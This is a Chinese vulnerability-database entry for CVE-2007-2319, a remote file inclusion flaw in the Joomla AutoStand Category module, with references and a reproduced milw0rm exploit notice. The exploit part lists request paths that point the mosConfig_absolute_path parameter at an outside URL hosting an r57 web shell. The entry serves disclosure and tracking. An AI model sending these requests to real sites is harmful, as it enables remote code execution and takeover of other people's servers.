Joomla! AutoStand模块PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112711 漏洞类型 代码注入
发布时间 2007-04-14 更新时间 2007-10-01
CVE编号 CVE-2007-2319 CNNVD-ID CNNVD-200704-544
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3734
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-544
|漏洞详情
Joomla!AutoStand模块中存在PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)modules/mod_as_category/或(2)modules/中的mod_as_category.php的mosConfig_absolute_path参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
=======================================================
Joomla Module AutoStand Category <= 1.1 Remote File include Vulnerabilities
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site : 
http://www.joomlafrance.org/telecharger/startdown/AutoStand_Category.html
=======================================================
Description: its a joomla module Shows the categories created
=======================================================

File : /mod_as_category/mod_as_category.php
#  include($mosConfig_absolute_path . 
"/components/com_autostand/languages/portuguese.php  <= line 10

# Don't allow direct acces to the file
  defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not 
allowed.' ); <= line  21+22
========================================================
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/modules/mod_as_category.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================



#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-14]
|参考资料

来源:XF
名称:autostand-modascategory-file-include(33660)
链接:http://xforce.iss.net/xforce/xfdb/33660
来源:BID
名称:23490
链接:http://www.securityfocus.com/bid/23490
来源:MILW0RM
名称:3734
链接:http://www.milw0rm.com/exploits/3734
来源:VUPEN
名称:ADV-2007-1392
链接:http://www.frsirt.com/english/advisories/2007/1392
来源:OSVDB
名称:35753
链接:http://osvdb.org/35753